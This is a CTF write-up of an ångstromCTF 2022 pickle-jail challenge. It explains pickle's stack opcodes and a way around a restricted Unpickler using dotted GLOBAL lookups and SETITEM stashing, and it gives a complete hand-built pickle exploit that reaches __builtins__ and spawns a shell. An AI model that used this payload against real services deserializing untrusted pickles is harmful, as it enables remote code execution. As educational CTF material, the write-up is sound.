Kevin Higgs

ångstromCTF 2022 (210 points)

Now that kmh is gone, clam’s been going through pickle withdrawal. To help him cope, he wrote his own pickle pyjail. It’s nothing like kmh’s, but maybe it’s enough.

Language jails are rapidly becoming one of my CTF areas of expertise. Not sure how I feel about that.

pickle is a Python object serialization format. As the docs page loudly proclaims, it is not secure. Roughly the simplest possible code to pop a shell (adapted from David Hamann, who constructs a more realistic RCE) looks like:
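A minimal sketch of the idea, not Hamann's exact code: a class whose `__reduce__` hands the unpickler a callable plus its arguments. The class name `Exploit` and the harmless `echo` command are placeholders chosen for illustration; a real payload would run something like `sh` instead.

```python
import os
import pickle


class Exploit:
    """Hypothetical payload class; the name is arbitrary."""

    def __reduce__(self):
        # Tell pickle to "rebuild" this object by calling os.system(...).
        # "echo pwned" is a harmless stand-in for a real command like "sh".
        return (os.system, ("echo pwned",))


payload = pickle.dumps(Exploit())

# Nothing runs until somebody unpickles the bytes:
# pickle.loads(payload)
```

The dangerous part is entirely on the loading side: whoever calls `pickle.loads` on these bytes runs the command.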

At a high level, the pickle format is a stack-based mini-language. It’s not much of a language in and of itself — it has no control flow whatsoever and just executes opcodes from start to end. (Each opcode is one byte and is followed by zero or more arguments, whose format depends on the opcode. Each argument is either a fixed number of bytes or an arbitrary number of bytes up to the next newline.) But, crucially, the pickle language has opcodes GLOBAL, which can look up any global, and REDUCE, which can call any callable Python object. Using these two opcodes, you can call just about any Python built-in function with any conceivable argument — for example, os.system with a command to pop a shell. This is why pickle is completely insecure by default.
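To make the stack machine concrete, here is a small hand-assembled pickle that uses GLOBAL and REDUCE to call a harmless built-in. The choice of `len` and the string `hello` are just for illustration; any importable callable would be looked up the same way by a stock unpickler.

```python
import pickle

payload = (
    pickle.GLOBAL + b"builtins\nlen\n"  # push the global builtins.len
    + pickle.UNICODE + b"hello\n"       # push the string "hello"
    + pickle.TUPLE1                     # wrap it into the tuple ("hello",)
    + pickle.REDUCE                     # call len("hello"), push the result
    + pickle.STOP                       # return the top of the stack
)

result = pickle.loads(payload)
print(result)  # 5
```

Swap `builtins` and `len` for `os` and `system` and you have the classic shell-popping pickle.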

However, the behavior of opcode GLOBAL above is determined by Unpickler.find_class, which can be overridden to restrict unpickling. DiceCTF 2022 actually had a pickle challenge with the most restricted unpickler imaginable:

I never got around to writing that challenge up (maybe one day…), but I believe it was not intended to allow or require arbitrary code execution.

Well, in this challenge, find_class is still pretty restricted. We are only allowed to access properties of the empty module, and if we copy the bit of code that creates empty into a REPL to investigate, it doesn’t seem like there are that many:
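A rough stand-in for that setup, reconstructed from the checks described in this post rather than copied from the challenge source. The use of `types.ModuleType`, the class name `RestrictedUnpickler`, the helper `try_load`, and the error message are all assumptions.

```python
import io
import pickle
import sys
import types

# Assumption: the challenge builds a bare module object and registers it.
empty = types.ModuleType("empty")
sys.modules["empty"] = empty


class RestrictedUnpickler(pickle.Unpickler):
    """Hypothetical stand-in for the challenge's unpickler."""

    def find_class(self, module, name):
        # Only names on `empty`, with at most one dot, get through.
        if module == "empty" and name.count(".") <= 1:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked: {module}.{name}")


def try_load(data):
    """Unpickle with the restricted unpickler; return the result or the error."""
    try:
        return RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return exc


blocked = try_load(pickle.dumps(len))  # builtins.len is not on `empty`
print(blocked)
print(dir(empty))  # only a handful of module dunders
```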

But this is misleading; empty has a few properties that every Python object does by dint of inheritance, which are the same properties we use in the standard jailbreaks for eval(..., {"__builtins__": {}}). For example:
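A quick local check along those lines, again assuming `empty` is a bare module object like the one `types.ModuleType` creates:

```python
import types

empty = types.ModuleType("empty")  # assumed stand-in for the challenge's module

# dir() on a module only lists its __dict__, so __class__ is not shown there...
print("__class__" in dir(empty))

# ...but ordinary attribute lookup still finds it through the type.
module_type = empty.__class__        # the module type
root = module_type.__base__          # object
subclasses = root.__subclasses__()   # every direct subclass of object

print(module_type, root, len(subclasses))
```

The number of subclasses depends on the Python version and on what has been imported, which is why any index into that list has to be found by experiment.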

To have a target to aim for, I’ll just grab the headlining quote in Finding Python3 built-ins:

If we get that far, we’re home free — we can grab exec or eval, or __import__ the os module, or pull off many other kinds of mischief.

Now, the filtered list comprehension is probably out of our reach to express in pickle code, so we’ll just try to get our pickle to do the following (135 is the index of Sized on the server’s list of __subclasses__, which I found by looking locally and then just trying nearby numbers against the server):

empty.__class__.__base__.__subclasses__()[135].__len__.__globals__['__builtins__']
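Here is one way to find the local index and sanity-check the chain before touching any pickle code. This is a sketch of the "looking locally" step; the index it prints will almost certainly differ from the server's 135.

```python
import collections.abc  # make sure Sized is loaded; it normally already is

subclasses = object.__subclasses__()

# Find Sized by name, the way a filtered comprehension would.
index = next(i for i, cls in enumerate(subclasses) if cls.__name__ == "Sized")
sized = subclasses[index]

# Sized.__len__ is a plain Python function, so it carries __globals__.
builtins_ns = sized.__len__.__globals__["__builtins__"]

# __builtins__ is usually a dict here, but it can also be the module itself.
if isinstance(builtins_ns, dict):
    exec_fn = builtins_ns["exec"]
else:
    exec_fn = builtins_ns.exec

print(index, sized, exec_fn)
```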

This is still a little trickier than it sounds. Some resources like “Can I safely unpickle untrusted data?” make it sound like we can grab attributes willy-nilly, but getattr is not actually something we have available as a native pickle opcode (without literally grabbing the getattr function with GLOBAL, which is blocked by the overridden find_class). Instead, pickle just has opcodes for setattr and setitem. From the design standpoint of pickle, this makes sense since opcodes are meant to help you construct data, not access it; you shouldn’t need to get attributes of the data you constructed since you probably also put it there. But it makes our job a little more annoying.

The key insight that allows us to get over this hurdle is that the GLOBAL opcode uses getattr internally. What’s more, from pickle protocol 4 onward, the lookup behind GLOBAL supports dotted paths: calling GLOBAL with foo and "bar.baz" as arguments will get you foo.bar.baz. The challenge tries to limit how deep we can go by checking that name.count(".") <= 1, so each lookup can contain at most one dot. But because we can use the SETITEM opcode to set items onto empty.__dict__, we can stash intermediate results into empty and then go through empty to access their attributes with a dotted path. That is, given some value foo that we want to get the bar attribute of, we could write pickle opcodes that roughly do the following:
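A runnable sketch of the stash-then-look-up trick, using `object` as foo and `__name__` as bar. The module setup and the `RestrictedUnpickler` class are assumed stand-ins for the challenge, built only from the checks described above.

```python
import io
import pickle
import sys
import types

# Assumed stand-in for the challenge environment.
empty = types.ModuleType("empty")
sys.modules["empty"] = empty


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "empty" and name.count(".") <= 1:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("blocked")


payload = (
    pickle.PROTO + b"\x04"                              # enable dotted paths
    + pickle.GLOBAL + b"empty\n__dict__\n"              # push empty.__dict__
    + pickle.UNICODE + b"a\n"                           # key: "a"
    + pickle.GLOBAL + b"empty\n__class__.__base__\n"    # value: foo (object)
    + pickle.SETITEM                                    # empty.a = foo
    + pickle.POP                                        # drop empty.__dict__
    + pickle.GLOBAL + b"empty\na.__name__\n"            # push empty.a.__name__
    + pickle.STOP
)

result = RestrictedUnpickler(io.BytesIO(payload)).load()
print(result)  # object
```

Every GLOBAL name here contains at most one dot, so the filter never trips, yet the final lookup effectively reaches three attributes deep.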

(I got stuck getting this to work for a while because I didn’t realize that this requires protocol version 4+, and that that’s still something you need to express in the pickle code. The documentation didn’t help — the pickletools source code mentions in one comment, “However, a pickle does not contain its version number embedded within it.” Eventually I figured this out by manually pickling something on a dotted path and disassembling the pickle.)
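That experiment can be reproduced with any object whose qualified name contains a dot. The sketch below uses `json.JSONDecoder.decode` purely as a convenient standard-library example. Note that the stock pickler emits STACK_GLOBAL rather than GLOBAL at protocol 4; the part that matters is the PROTO opcode at the very start.

```python
import json
import pickle
import pickletools

# A function whose qualified name contains a dot: "JSONDecoder.decode".
target = json.JSONDecoder.decode

data = pickle.dumps(target, protocol=4)
opcodes = [(op.name, arg) for op, arg, pos in pickletools.genops(data)]
names = [name for name, arg in opcodes]

print(opcodes[0])  # the PROTO opcode and its argument come first
print(names)
```

`pickletools.dis(data)` prints the same information in a more readable, annotated form.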

To put the full exploit together, we just need to look up the opcodes we need and concatenate them with the desired arguments. Each opcode is available as a constant from the pickle module, so we can write pretty literate code. The opcodes we use below are:

  • PROTO, which takes a byte as an argument and indicates that the pickle has that protocol version
  • GLOBAL, which takes two newline-delimited strings
  • UNICODE, which takes a newline-delimited string and pushes it onto the stack
  • SETITEM, which pops c, b, a from the stack, sets a[b] = c, and pushes a back
  • EMPTY_TUPLE, which pushes a length-0 tuple
  • REDUCE, which pops a tuple of arguments and a function from the stack, calls the function with the arguments, and pushes the result back onto the stack
  • BININT1, which takes a byte as an argument and pushes it as an integer
  • TUPLE1, which constructs a length-1 tuple from the top of the stack
  • POP, which pops an element off the stack and discards it (not really necessary)
  • STOP, which concludes the program (not really necessary)
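As a warm-up before the real thing, here is a tiny program assembled from a few of these constants and checked with pickletools. The payload is only an illustration and is not part of the exploit.

```python
import pickle
import pickletools

program = (
    pickle.PROTO + b"\x04"           # one-byte argument: protocol version
    + pickle.BININT1 + bytes([135])  # one-byte argument: the integer 135
    + pickle.TUPLE1                  # no argument: wrap the top of the stack
    + pickle.STOP                    # no argument: return the top of the stack
)

names = [op.name for op, arg, pos in pickletools.genops(program)]
value = pickle.loads(program)
print(names, value)  # ['PROTO', 'BININT1', 'TUPLE1', 'STOP'] (135,)
```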

Here’s my full exploit:

import pickle
body = (
    # Set the protocol version so that dotted paths are allowed
    pickle.PROTO + b'\x04' +

    # Push empty.__dict__. This will stay on the stack until the end.
    # We will call SETITEM on it.
    pickle.GLOBAL + b'empty\n__dict__\n' +

    # empty.a = empty.__class__.__base__ = object
    pickle.UNICODE + b'a\n' +
    pickle.GLOBAL + b'empty\n__class__.__base__\n' +
    pickle.SETITEM +

    # empty.b = empty.a.__subclasses__() = object.__subclasses__()
    pickle.UNICODE + b'b\n' +
    pickle.GLOBAL + b'empty\na.__subclasses__\n' +
    pickle.EMPTY_TUPLE +
    pickle.REDUCE +
    pickle.SETITEM +

    # empty.c = empty.b[135] = Sized
    pickle.UNICODE + b'c\n' +
    pickle.GLOBAL + b'empty\nb.__getitem__\n' +
    # 135 was the value that worked against the remote server, but is not by
    # any means constant between Python versions. I ran the snippet earlier to
    # get the value on my versions of Python and then tweaked it in this
    # exploit until it worked. Wrong values will just say "Cannot get
    # attribute".
    pickle.BININT1 + bytes([135]) +
    pickle.TUPLE1 +
    pickle.REDUCE +
    pickle.SETITEM +

    # empty.d = empty.c.__len__
    pickle.UNICODE + b'd\n' +
    pickle.GLOBAL + b'empty\nc.__len__\n' +
    pickle.SETITEM +

    # empty.e = empty.d.__globals__
    pickle.UNICODE + b'e\n' +
    pickle.GLOBAL + b'empty\nd.__globals__\n' +
    pickle.SETITEM +

    # empty.f = empty.e.__getitem__("__builtins__") = empty.e["__builtins__"]
    pickle.UNICODE + b'f\n' +
    pickle.GLOBAL + b'empty\ne.__getitem__\n' +
    pickle.UNICODE + b'__builtins__\n' +
    pickle.TUPLE1 +
    pickle.REDUCE +
    pickle.SETITEM +

    # we're ready for the finale; pop empty.__dict__
    # (not that we really need to)
    pickle.POP +

    # pop a shell:
    # empty.f.__getitem__("exec")('__import__("os").system("sh")')
    pickle.GLOBAL + b'empty\nf.__getitem__\n' +
    pickle.UNICODE + b'exec\n' +
    pickle.TUPLE1 +
    pickle.REDUCE +
    pickle.UNICODE + b'__import__("os").system("sh")\n' +
    pickle.TUPLE1 +
    pickle.REDUCE +

    # we don't really need this either
    pickle.STOP
)
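# Uncomment to test locally (needs the challenge's empty module registered
# in sys.modules) or to inspect the opcodes (needs `import pickletools`):
# pickle.loads(body)
# pickletools.dis(body)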
print(body.hex())

The hexed exploit is:

The bytestring is:

Once we pop a shell, we can cd / and cat flag.txt and we’re done!

actf{__i_miss_kmh11_pyjails__}
